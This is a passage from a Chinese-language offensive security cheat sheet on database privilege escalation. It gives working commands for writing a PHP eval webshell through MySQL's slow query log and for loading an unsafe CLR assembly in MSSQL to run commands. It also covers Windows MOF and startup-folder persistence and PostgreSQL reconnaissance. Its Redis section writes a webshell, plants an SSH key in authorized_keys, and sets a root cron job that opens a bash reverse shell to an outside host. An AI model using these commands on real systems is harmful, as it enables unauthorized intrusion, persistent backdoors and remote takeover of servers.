-- 写入慢查询日志(root) setGLOBAL slow_query_log="ON"; -- 开启慢查询日志 setGLOBAL slow_query_log_file='C:/phpStudy/PHPTutorial/WWW/slow.php'; -- 修改慢查询日志存储路径 select "<?php @eval($_POST[abc]); ?>" from mysql.db where sleep(5); -- 写入shell(慢查询只记录,查询时间超过5秒的操作)
其他位置
MOF
MOF 提权是一个有历史的漏洞,基本上在 Windows Server 2003 的环境下才可以成功。提权的原理是 C:/Windows/system32/wbem/mof/ 目录下的 mof 文件每 隔一段时间(几秒钟左右)都会被系统执行
启动项
往启动项路径里面写入脚本,可以利用 vbs 执行一些 CMD 命令
1 2 3 4 5 6 7
# Windows Server 2003 的启动项路径: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup C:\Documents and Settings\All Users\Start Menu\Programs\Startup
# Windows Server 2008 的启动项路径: C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
MSSQL(sqlserver)数据库提权
在 SQL Server 中,扩展存储过程(Extended Stored Procedures)是允许 SQL Server 调用外部程序(通常是 DLL 文件)的机制
--启用CLR,test 是当前指定的数据库 sp_configure 'show advanced options',1;RECONFIGURE; sp_configure 'clr enabled',1;RECONFIGURE; ALTER DATABASE [test] SET trustworthy ON
-- 通过 SQL 语句导入程序集 CREATE ASSEMBLY [Database1] AUTHORIZATION [dbo] FROM0x16进制的dll WITH PERMISSION_SET = UNSAFE; GO
-- 从程序集中创建存储过程 dbo.ExecCommand CREATEPROCEDURE [dbo].[ExecCommand] @cmd NVARCHAR (MAX) NULL ASEXTERNAL NAME [Database1].[StoredProcedures].[ExecCommand] GO
SELECT setting FROM pg_settings WHERE name ='data_directory'; --获取安装目录 SELECT setting FROM pg_settings WHERE name ='config_file'; --获取配置文件目录 select inet_server_addr() --获取Postgres内网ip地址
redis-cli -h 192.168.111.133 info #获取redis.conf的绝对路径 config set dir /var/www/html config set dbfilename shell.php set xxx "\r\n\r\n<?php @eval($_POST[shell]);?>\r\n\r\n"#用redis写入备份的时候会自带一些版本信息,如果不换行可能会导致无法执行 save
利用redis写ssh公钥
1 2 3 4 5 6 7
(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > /root/.ssh/key.txt cat /root/.ssh/key.txt | redis-cli -h 192.168.111.133 -x set xxx #-x 代表从标准输入读取数据作为该命令的最后一个参数 redis-cli -h 192.168.111.133 config set dir /root/.ssh config set dbfilename authorized_keys save
利用redis写计划任务
1 2 3 4 5
redis-cli -h 192.168.111.133 set xxx "\n\n*/1 * * * * /bin/bash -i>&/dev/tcp/192.168.111.128/6666 0>&1\n\n" config set dir /var/spool/cron/crontabs/ config set dbfilename root save